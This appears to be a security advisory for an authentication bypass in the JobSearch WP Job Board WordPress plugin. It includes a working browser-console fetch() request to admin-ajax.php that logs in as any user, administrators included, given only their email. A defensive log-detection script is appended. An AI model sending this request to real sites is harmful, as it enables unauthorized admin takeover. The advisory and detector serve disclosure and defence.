wpexploit | Marc Montpas | WPEX-ID:E528E3CD-A45C-4BF7-A37A-101F5C257ACD
History: Feb 02, 2024 - 12:00 a.m.

JobSearch WP Job Board < 2.3.4 - Authentication Bypass

Tags: jobsearch, wp job board, authentication bypass, browser, console, exploit, admin access, security vulnerability

AI Score: 6.8 (Confidence: High)
EPSS: 0 (Percentile: 9.0%)

Description

The plugin does not prevent attackers from logging in as any user knowing only that user's email address.

Browse to the site, paste the following in your browser's console (replace the email address with that site's administrator's email address):

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams({
        'action': 'jobsearch_facebook_get_soc_login_url',
        'user_data': JSON.stringify({
            "id": Math.random()*1000,
            "email": "[email protected]",
        })
    })
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));

Then access /wp-admin, and notice you're logged in as an admin.
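
A log-correlation check for the request sequence described above, as an added example that is not part of the original advisory or the plugin's code. The record shape (one object per request with the raw POST body, as a WAF or reverse-proxy audit log could provide), the sample records and the function names are assumptions.

```javascript
const ACTION = 'jobsearch_facebook_get_soc_login_url';

// Constructed sample records. Assumed shape: one object per request, with the
// raw POST body captured (e.g. by a WAF or reverse-proxy audit log).
const SAMPLE_LOG = [
  { ts: 1000, ip: '203.0.113.7', method: 'POST', path: '/wp-admin/admin-ajax.php',
    body: 'action=' + ACTION + '&user_data=' +
      encodeURIComponent('{"id":412.7,"email":"Admin@example.test"}') },
  { ts: 1004, ip: '203.0.113.7', method: 'GET', path: '/wp-admin/', body: '' },
  { ts: 1010, ip: '198.51.100.9', method: 'POST', path: '/wp-admin/admin-ajax.php',
    body: 'action=heartbeat' },
  { ts: 1020, ip: '198.51.100.9', method: 'GET', path: '/wp-admin/', body: '' },
  { ts: 2000, ip: '192.0.2.44', method: 'POST', path: '/wp-admin/admin-ajax.php',
    body: 'action=' + ACTION + '&user_data=not-json' },
];

// Returns { email } for a request to the vulnerable action, otherwise null.
function parseSocialLogin(rec) {
  if (rec.method !== 'POST' || !rec.path.endsWith('/wp-admin/admin-ajax.php')) return null;
  const params = new URLSearchParams(rec.body);
  if (params.get('action') !== ACTION) return null;
  let email = null;
  try {
    const data = JSON.parse(params.get('user_data') || '');
    if (data && typeof data.email === 'string') email = data.email.toLowerCase();
  } catch (_) { /* malformed user_data: still report the request */ }
  return { email };
}

// admin-ajax.php is reachable without a session, so it is not a follow-up signal.
const isAdminPage = (p) =>
  (p === '/wp-admin' || p.startsWith('/wp-admin/')) && !p.endsWith('/admin-ajax.php');

// One alert per hit; adminFollowUp marks a /wp-admin page load within windowSec.
function findSuspectLogins(records, windowSec = 300) {
  const alerts = [];
  const pending = new Map(); // ip -> latest alert for that client
  for (const rec of [...records].sort((a, b) => a.ts - b.ts)) {
    const hit = parseSocialLogin(rec);
    if (hit) {
      const alert = { ip: rec.ip, ts: rec.ts, email: hit.email, adminFollowUp: false };
      alerts.push(alert);
      pending.set(rec.ip, alert);
    } else if (pending.has(rec.ip) && isAdminPage(rec.path)) {
      const prior = pending.get(rec.ip);
      if (rec.ts - prior.ts <= windowSec) prior.adminFollowUp = true;
    }
  }
  return alerts;
}
```

Alerts with `adminFollowUp` set whose `email` belongs to a privileged account are the ones to review first.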
